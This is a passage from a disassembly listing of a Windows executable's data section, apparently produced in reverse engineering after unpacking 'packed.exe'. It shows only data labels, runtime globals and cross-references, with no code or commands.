dword_42EC08 dd 71C4576Ch ; DATA XREF: sub_405EFF+97A�w
; sub_405EFF+9CE�r ...
dword_42EC0C dd 77D4702Fh ; DATA XREF: sub_405EFF+158�w
; sub_405EFF+1AD�r ...
dword_42EC10 dd 77E6C0E3h ; DATA XREF: sub_403AC8+4�r
; sub_405EFF+8C�w ...
dword_42EC14 dd 71AB1ED3h ; DATA XREF: sub_40318B+2C2�r
; sub_40588C+2DA�r ...
dword_42EC18 dd 71B2A381h ; DATA XREF: sub_405EFF+ABA�w
; sub_405EFF+AD6�r
dword_42EC1C dd 77DDA595h ; DATA XREF: sub_405EFF+2C2�w
; sub_408849+55�r
dword_42EC20 dd 77DD22EAh ; DATA XREF: sub_405EFF+224�w
; sub_405EFF+25F�r
dword_42EC24 dd 773F97B0h ; DATA XREF: sub_405EFF+B21�w
dword_42EC28 dd 76D67A29h ; DATA XREF: sub_405EFF+A63�w
; sub_408323+CE�r
dword_42EC2C dd 76D674FAh ; DATA XREF: sub_405EFF+A56�w
; sub_405EFF+A5D�r ...
dword_42EC30 dd 71AB3C22h ; DATA XREF: sub_4013EE+18D�r
; .text:004017C1�r ...
dword_42EC34 dd 71AB2BBFh ; DATA XREF: sub_405EFF+61A�w
; sub_405EFF+73C�r ...
dword_42EC38 dd 1F7BA3A9h ; DATA XREF: sub_405EFF+B6B�w
; sub_405EFF+BA6�r
dword_42EC3C dd 71AB401Ch ; DATA XREF: sub_40226C+1F�r
; sub_4027F8+86�r ...
dword_42EC40 dd 71C214BAh ; DATA XREF: sub_405EFF+939�w
; sub_405EFF+9A6�r ...
dword_42EC44 dd 71AB868Dh ; DATA XREF: sub_404771+13A�r
; sub_405C73+94�r ...
dword_42EC48 dd 71AB1A6Dh ; DATA XREF: sub_4013EE:loc_401666�r
; sub_4013EE+28C�r ...
dword_42EC4C dd 71AB155Ah ; DATA XREF: sub_40275B+4C�r
; sub_404771+B7�r ...
dword_42EC50 dd 71B22C25h ; DATA XREF: sub_401000+B0�r
; sub_401000+C8�r ...
dword_42EC54 dd 71AB5A01h ; DATA XREF: sub_40318B+4F�r
; sub_405EFF+4C8�w ...
dword_42EC58 dd 71B2ACCBh ; DATA XREF: sub_405EFF+AA0�w
; sub_405EFF+AC1�r
dword_42EC5C dd 77E78C17h ; DATA XREF: sub_405EFF+31�w
; sub_405EFF+AD�r ...
dword_42EC60 dd 77D49A11h ; DATA XREF: sub_405EFF+17F�w
; sub_405EFF+1CA�r
align 8
dword_42EC68 dd 76D62A37h ; DATA XREF: sub_405EFF+8AF�w
; sub_405EFF+8C3�r ...
dword_42EC6C dd 77E6CBF9h ; DATA XREF: sub_405EFF+99�w
; sub_405EFF+EA�r ...
dword_42EC70 dd 0 ; DATA XREF: sub_405EFF:loc_405FFD�w
; sub_405EFF+12B�w ...
dword_42EC74 dd 0 ; DATA XREF: sub_405EFF+126�w
; sub_406AE8+1C�r
dword_42EC78 dd 0 ; DATA XREF: sub_405EFF:loc_4060FA�w
; sub_406AE8:loc_406B30�r
dword_42EC7C dd 0 ; DATA XREF: sub_405EFF+1F6�w
; sub_406AE8+50�r
dword_42EC80 dd 0 ; DATA XREF: sub_405EFF:loc_40618F�w
; sub_405EFF:loc_4061D4�w ...
dword_42EC84 dd 0 ; DATA XREF: sub_405EFF+3A6�w
; sub_406AE8+84�r
dword_42EC88 dd 0 ; DATA XREF: sub_405EFF:loc_40638B�w
; sub_406AE8:loc_406B98�r
dword_42EC8C dd 0 ; DATA XREF: sub_405EFF+487�w
; sub_406AE8+B8�r
dword_42EC90 dd 0 ; DATA XREF: sub_405EFF:loc_40665C�w
; sub_406AE8:loc_406BCC�r
dword_42EC94 dd 0 ; DATA XREF: sub_405EFF+758�w
; sub_406AE8+EC�r
dword_42EC98 dd 0 ; DATA XREF: sub_405EFF:loc_406747�w
; sub_405EFF+877�w ...
dword_42EC9C dd 0 ; DATA XREF: sub_405EFF+872�w
; sub_406AE8+120�r
dword_42ECA0 dd 0 ; DATA XREF: sub_405EFF:loc_4067DB�w
; sub_406AE8:loc_406C34�r ...
dword_42ECA4 dd 0 ; DATA XREF: sub_405EFF+8D7�w
; sub_406AE8+154�r
dword_42ECA8 dd 0 ; DATA XREF: sub_405EFF:loc_4068E6�w
; sub_406AE8:loc_406C68�r ...
dword_42ECAC dd 0 ; DATA XREF: sub_405EFF+9E2�w
; sub_406AE8+188�r
dword_42ECB0 dd 0 ; DATA XREF: sub_405EFF:loc_406930�w
; sub_406AE8:loc_406C9C�r
dword_42ECB4 dd 0 ; DATA XREF: sub_405EFF+A2C�w
; sub_406AE8+1BC�r
dword_42ECB8 dd 0 ; DATA XREF: sub_405EFF:loc_40697A�w
; sub_406AE8:loc_406CD0�r
dword_42ECBC dd 0 ; DATA XREF: sub_405EFF+A76�w
; sub_406AE8+1F0�r
dword_42ECC0 dd 0 ; DATA XREF: sub_405EFF:loc_4069EE�w
; sub_406AE8:loc_406D04�r
dword_42ECC4 dd 0 ; DATA XREF: sub_405EFF+AEA�w
; sub_406AE8+224�r
dword_42ECC8 dd 0 ; DATA XREF: sub_405EFF:loc_406A38�w
; sub_406AE8:loc_406D38�r
dword_42ECCC dd 0 ; DATA XREF: sub_405EFF+B34�w
; sub_406AE8+258�r
dword_42ECD0 dd 0 ; DATA XREF: sub_405EFF:loc_406AD6�w
; sub_406AE8:loc_406D6C�r
dword_42ECD4 dd 0 ; DATA XREF: sub_405EFF+BD2�w
; sub_406AE8+28C�r
align 10h
; char byte_42ECE0[]
byte_42ECE0 db 204h dup(0) ; DATA XREF: sub_40703D+6A�o
; char byte_42EEE4[]
byte_42EEE4 db 5Ch dup(0) ; DATA XREF: sub_4074FB:loc_407618�o
; sub_4074FB+131�o ...
; char byte_42EF40[]
byte_42EF40 db 204h dup(0) ; DATA XREF: sub_40822D+7C�o
; sub_40822D+A5�o
; char byte_42F144[]
byte_42F144 db 5Ch dup(0) ; DATA XREF: sub_4080F9:loc_40821B�o
; sub_4080F9+12D�o
; char byte_42F1A0[]
byte_42F1A0 db 204h dup(0) ; DATA XREF: sub_4077B6+4B�o
; sub_4077B6+7D�o ...
; char byte_42F3A4[]
byte_42F3A4 db 200h dup(0) ; DATA XREF: sub_407A65+61�o
; sub_407A65+88�o ...
; char byte_42F5A4[]
byte_42F5A4 db 204h dup(0) ; DATA XREF: sub_4073D2+33�o
; sub_4073D2+50�o ...
; char byte_42F7A8[]
byte_42F7A8 db 18h dup(0) ; DATA XREF: sub_408401+32�o
; char Str1[]
Str1 dd 0 ; DATA XREF: sub_402C6B+A�o
; sub_402C6B+44�r ...
dd 5 dup(0)
dword_42F7D8 dd 0 ; DATA XREF: sub_402C6B+60�r
; sub_409557+8B5�r
dd 220h dup(0)
dword_43005C dd 0B9h dup(0) ; DATA XREF: .data:off_41D3F4�o
; .data:0041DAA8�o
dword_430340 dd 0 ; DATA XREF: sub_4027F8+A5�r
; sub_402C6B+2D�o ...
dd 7Fh dup(0)
dword_430540 dd 0 ; DATA XREF: sub_411C3A+41�w
; sub_411D75+40�w ...
dword_430544 dd 0 ; DATA XREF: sub_4027F8:loc_40283F�r
; sub_4027F8+7C�r ...
dword_430548 dd 0 ; DATA XREF: sub_40F002+164�w
; sub_40FEA9+AE�w ...
dword_43054C dd 0 ; DATA XREF: sub_403DCB+C�r
; sub_404771+7E�w ...
dword_430550 dd 0 ; DATA XREF: sub_40EB3A+11E�w
; sub_40ED21+53�r ...
dword_430554 dd 0 ; DATA XREF: sub_4022E3+122�w
; sub_4022E3+242�w ...
byte_430558 db 0 ; DATA XREF: sub_409277+91�o
; sub_409557+2BB7�r ...
align 4
dd 547Dh dup(0)
dword_445750 dd 0BE60h dup(0) ; DATA XREF: .data:off_41FCD4�o
dword_4750D0 dd 1Ch ; DATA XREF: sub_4021A2:loc_402210�r
; WinMain(x,x,x,x)+3D�w ...
align 8
dword_4750D8 dd 0 ; DATA XREF: WinMain(x,x,x,x):loc_409189�o
; char byte_4750DC[]
byte_4750DC db 80h dup(0) ; DATA XREF: WinMain(x,x,x,x)+509�o
; WinMain(x,x,x,x)+5C2�o ...
; char byte_47515C[]
byte_47515C db 40h dup(0) ; DATA XREF: WinMain(x,x,x,x)+520�o
; char byte_47519C[]
byte_47519C db 90h dup(0) ; DATA XREF: WinMain(x,x,x,x)+537�o
dword_47522C dd 0 ; DATA XREF: WinMain(x,x,x,x)+52B�w
; WinMain(x,x,x,x)+5D9�w ...
dword_475230 dd 0 ; DATA XREF: WinMain(x,x,x,x)+54A�w
align 10h
byte_475240 db 0 ; DATA XREF: sub_4093DF+28�r
; sub_4093DF+30�o
align 4
; char byte_475244
byte_475244 db 0 ; DATA XREF: WinMain(x,x,x,x):loc_409213�r
; WinMain(x,x,x,x)+609�o
align 4
; char byte_475248[]
byte_475248 db 4 dup(0) ; DATA XREF: WinMain(x,x,x,x)+61F�o
; char byte_47524C[]
byte_47524C db 4 dup(0) ; DATA XREF: WinMain(x,x,x,x)+631�o
dword_475250 dd 0 ; DATA XREF: WinMain(x,x,x,x)+576�w
; WinMain(x,x,x,x)+58D�r ...
dword_475254 dd 0 ; DATA XREF: WinMain(x,x,x,x)+50E�w
; sub_409557+828�r
; char byte_475258[]
byte_475258 db 4 dup(0) ; DATA XREF: sub_409557+52BA�o
; ___crtLCMapStringA+57�o ...
dword_47525C dd 0 ; DATA XREF: sub_40EDBE:loc_40EDDF�r
; sub_40EEAD+54�r ...
dword_475260 dd 0 ; DATA XREF: sub_40EDBE�r
; sub_40EEAD+37�r ...
dword_475264 dd 0 ; DATA XREF: sub_40EDEE+1A�r
; sub_40F002+83�o
dword_475268 dd 0 ; DATA XREF: sub_40EDBE:loc_40EDD2�r
; sub_40F002+11B�w
; char byte_47526C[]
byte_47526C db 34h dup(0) ; DATA XREF: sub_40EEAD+13�o
; sub_40F002:loc_40F13F�o
; int dword_4752A0
dword_4752A0 dd 0 ; DATA XREF: sub_40EEAD+CD�r
; sub_40EEAD+EC�r ...
align 10h
dword_4752B0 dd 0 ; DATA XREF: sub_40F1B7+146�r
align 8
; char byte_4752B8[]
byte_4752B8 db 18h dup(0) ; DATA XREF: sub_40FAA1+8D�o
dword_4752D0 dd 0 ; DATA XREF: sub_411E82+16�o
; sub_411EA1+19�o
dword_4752D4 dd 7Ah dup(0) ; DATA XREF: sub_411E35+3D�o
byte_4754BC db 0 ; DATA XREF: sub_4102EE+6A�r
; sub_4102EE+98�w
align 10h
dd 0
; char byte_4754C4[]
byte_4754C4 db 3Ch dup(0) ; DATA XREF: sub_410D66+47�o
dword_475500 dd 0 ; DATA XREF: __fpmath+A�w
align 8
dword_475508 dd 0 ; DATA XREF: _time+5E�r _time+A4�w
align 10h
word_475510 dw 0 ; DATA XREF: _time+55�r _time+9A�o
word_475512 dw 0 ; DATA XREF: _time+48�r
db 2 dup(0)
word_475516 dw 0 ; DATA XREF: _time+3B�r
word_475518 dw 0 ; DATA XREF: _time+2E�r
word_47551A dw 0 ; DATA XREF: _time+21�r
align 10h
dword_475520 dd 0 ; DATA XREF: _strtok+3B�r _strtok+91�w
dword_475524 dd 0 ; DATA XREF: sub_412EA4+2B�w
; _strtoxl+1B9�w ...
dword_475528 dd 0 ; DATA XREF: sub_412EA4+35�w
; __close:loc_415E98�w ...
dword_47552C dd 0 ; DATA XREF: __sopen+13A�r
dword_475530 dd 0A28h ; DATA XREF: start+52�w
dword_475534 dd 501h ; DATA XREF: start+49�w
dword_475538 dd 5 ; DATA XREF: start+3E�w
dword_47553C dd 1 ; DATA XREF: start+30�w
dword_475540 dd 1 ; DATA XREF: WinMain(x,x,x,x):loc_408F0D�r
; __setargv+91�w
dword_475544 dd 480B00h ; DATA XREF: WinMain(x,x,x,x)+2FE�r
; WinMain(x,x,x,x)+31E�r ...
dd 0
; void *dword_47554C
dword_47554C dd 480A80h ; DATA XREF: __setenvp+44�w _getenv+9�r ...
dword_475550 dd 0 ; DATA XREF: ___crtsetenv+36�r
dword_475554 dd 0 ; DATA XREF: _getenv+16�r
; ___wtomb_environ+4�r ...
dd 0
off_47555C dd offset aCM_unpackerPac ; DATA XREF: __setargv+2E�w
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_475564 db 0 ; DATA XREF: _doexit+2D�w
; ___endstdio+5�r
align 4
dword_475568 dd 0 ; DATA XREF: _doexit+27�w
dword_47556C dd 0 ; DATA XREF: _doexit+4�r _doexit+8B�w
; void *Memory
Memory dd 0 ; DATA XREF: start+84�w
; __setenvp:loc_4176AC�r ...
align 8
dword_475578 dd 0 ; DATA XREF: __amsg_exit�r
; _fast_error_exit�r ...
dword_47557C dd 0 ; DATA XREF: _malloc�r
; _realloc:loc_412DC4�r ...
dword_475580 dd 0 ; DATA XREF: __callnewh�r
dword_475584 dd 0 ; DATA XREF: __cftoe+11�r __cftof+1A�r ...
byte_475588 db 0 ; DATA XREF: __cftoe+3�r __cftoe+98�r ...
align 4
dword_47558C dd 0 ; DATA XREF: __cftof+11�r __cftog+21�w ...
byte_475590 db 0 ; DATA XREF: __cftog+51�w
align 4
dword_475594 dd 1 ; DATA XREF: ___crtLCMapStringA+28�r
; ___crtLCMapStringA+4C�w ...
align 10h
dword_4755A0 dd 0 ; DATA XREF: _tolower+4�r _tolower+9D�r ...
align 10h
dword_4755B0 dd 0 ; DATA XREF: _mbstowcs+61�r
; _mbstowcs+BF�r ...
align 8
dword_4755B8 dd 1 ; DATA XREF: __setmbcp:loc_416F13�r
; _getSystemCP+4�w ...
dword_4755BC dd 0 ; DATA XREF: __stbuf+37�r
dd 0
dword_4755C4 dd 0 ; DATA XREF: __XcptFilter+3A�r
; __XcptFilter+46�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: __setargv:loc_41776A�o
; .data:off_47555C�o
align 4
dd 3Ah dup(0)
dword_4756CC dd 1 ; DATA XREF: ___crtGetEnvironmentStringsA+2�r
; ___crtGetEnvironmentStringsA+23�w ...
dword_4756D0 dd 0 ; DATA XREF: __FF_MSGBANNER+21�r
dword_4756D4 dd 0 ; DATA XREF: __openfile+154�w
; __stbuf:loc_41722B�w ...
dword_4756D8 dd 1 ; DATA XREF: ___crtGetStringTypeA+26�r
; ___crtGetStringTypeA:loc_418837�w
dword_4756DC dd 0 ; DATA XREF: __openfile+7�r
word_4756E0 dw 0 ; DATA XREF: __fltout+1A�o __fltout+46�r
byte_4756E2 db 0 ; DATA XREF: __fltout+39�r
align 4
dword_4756E4 dd 7 dup(0) ; DATA XREF: __fltout+52�o
dword_475700 dd 0 ; DATA XREF: __fltout+40�w __fltout+5C�o
dword_475704 dd 0 ; DATA XREF: __fltout+4D�w
dword_475708 dd 0 ; DATA XREF: __fltout+31�w
dword_47570C dd 0 ; DATA XREF: __fltout+52�w
dword_475710 dd 0 ; DATA XREF: __tzset+11�w __tzset+63�w ...
align 8
dword_475718 dd 0 ; DATA XREF: __tzset+33�o __tzset+46�r
dword_47571C dd 10h dup(0) ; DATA XREF: __tzset+C1�o
word_47575C dw 0 ; DATA XREF: __isindst+A8�r
word_47575E dw 0 ; DATA XREF: __tzset+54�r __isindst+DB�r ...
word_475760 dw 0 ; DATA XREF: __isindst+CA�r
word_475762 dw 0 ; DATA XREF: __isindst+D3�r
; __isindst:loc_41983A�r
word_475764 dw 0 ; DATA XREF: __isindst+C0�r
word_475766 dw 0 ; DATA XREF: __isindst+B8�r
word_475768 dw 0 ; DATA XREF: __isindst+B0�r
word_47576A dw 0 ; DATA XREF: __isindst+9E�r
dword_47576C dd 0 ; DATA XREF: __tzset+4B�r
dword_475770 dd 10h dup(0) ; DATA XREF: __tzset+FB�o
word_4757B0 dw 0 ; DATA XREF: __isindst+46�r
word_4757B2 dw 0 ; DATA XREF: __tzset:loc_419561�r
; __isindst+78�r ...
word_4757B4 dw 0 ; DATA XREF: __isindst+67�r
word_4757B6 dw 0 ; DATA XREF: __isindst+70�r
; __isindst:loc_4197CC�r
word_4757B8 dw 0 ; DATA XREF: __isindst+5D�r
word_4757BA dw 0 ; DATA XREF: __isindst+55�r
word_4757BC dw 0 ; DATA XREF: __isindst+4D�r
word_4757BE dw 0 ; DATA XREF: __isindst+3E�r
dword_4757C0 dd 0 ; DATA XREF: __tzset+80�r
; void *dword_4757C4
dword_4757C4 dd 0 ; DATA XREF: __tzset+132�r
; __tzset:loc_419636�r ...
dword_4757C8 dd 0 ; DATA XREF: ___tzset�r ___tzset+E�w
dword_4757CC dd 0 ; DATA XREF: ___crtMessageBoxA+3�r
; ___crtMessageBoxA+2E�w ...
dword_4757D0 dd 0 ; DATA XREF: ___crtMessageBoxA+43�w
; ___crtMessageBoxA:loc_419AC5�r
dword_4757D4 dd 0 ; DATA XREF: ___crtMessageBoxA+4A�w
; ___crtMessageBoxA+60�r
dword_4757D8 dd 0 ; DATA XREF: __sopen+3F�r
dword_4757DC dd 0 ; DATA XREF: ___crtCompareStringA+28�r
; ___crtCompareStringA+48�w ...
dword_4757E0 dd 344968h ; DATA XREF: _flsall:loc_415F8D�r
; __getstream+14�r ...
dd 7 dup(0)
dword_475800 dd 400h dup(0) ; DATA XREF: .data:off_4286D0�o
; .data:004286D8�o
; size_t NumOfElements
NumOfElements dd 200h ; DATA XREF: _flsall+9�r _flsall+56�r ...
dd 7 dup(0)
dword_476820 dd 480EF0h ; DATA XREF: __flsbuf+B1�r __filbuf+75�r ...
dword_476824 dd 3Fh dup(0) ; DATA XREF: __ioinit+92�o
dword_476920 dd 20h ; DATA XREF: __close+8�r __read+C�r ...
dword_476924 dd 4E4h ; DATA XREF: __setmbcp+14�r
; __setmbcp+65�w ...
align 10h
dword_476930 dd 3 dup(0) ; DATA XREF: __setmbcp+123�o
; __setmbcp+171�o ...
dword_47693C dd 0 ; DATA XREF: __setmbcp+108�w
; __setmbcp+15D�w ...
byte_476940 db 0 ; DATA XREF: _setSBUpLow:loc_4170E3�w
; _setSBUpLow:loc_417100�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_476A40 db 0 ; DATA XREF: __setmbcp+5C�o
; __setmbcp+AF�o ...
byte_476A41 db 0 ; DATA XREF: __splitpath+5D�r
; __setmbcp+A0�w ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_476B44 dd 0 ; DATA XREF: __setmbcp+6E�w
; __setmbcp+12B�w ...
dword_476B48 dd 10h ; DATA XREF: ___sbh_heap_init+32�w
; ___sbh_alloc_new_region+5�r ...
dword_476B4C dd 0 ; DATA XREF: ___sbh_free_block+239�r
; ___sbh_free_block+259�r ...
dword_476B50 dd 340650h ; DATA XREF: ___sbh_heap_init+2D�w
; ___sbh_free_block+310�w ...
; void *Dst
Dst dd 0 ; DATA XREF: ___sbh_heap_init:loc_413E97�w
; ___sbh_free_block+22C�r ...
dword_476B58 dd 1 ; DATA XREF: ___sbh_heap_init+24�w
; ___sbh_find_block�r ...
dword_476B5C dd 340650h ; DATA XREF: ___sbh_heap_init+15�w
; ___sbh_find_block+8�r ...
dword_476B60 dd 340000h ; DATA XREF: __heap_alloc+28�r
; _free+21�r ...
dword_476B64 dd 142340h ; DATA XREF: start+7A�w __wincmdln+F�r ...
dword_476B68 dd 1 ; DATA XREF: __setenvp+AD�w _getenv�r
dword_476B6C dd 1 ; DATA XREF: ___initmbctable�r
; ___initmbctable+11�w ...
dword_476B70 dd 0 ; DATA XREF: _doexit+3E�r
dword_476B74 dd 0 ; DATA XREF: _doexit+35�r _doexit+57�r
_data ends
; Section 4. (virtual address 00077000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00076C00
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 477000h
align 2000h
_idata2 ends
end start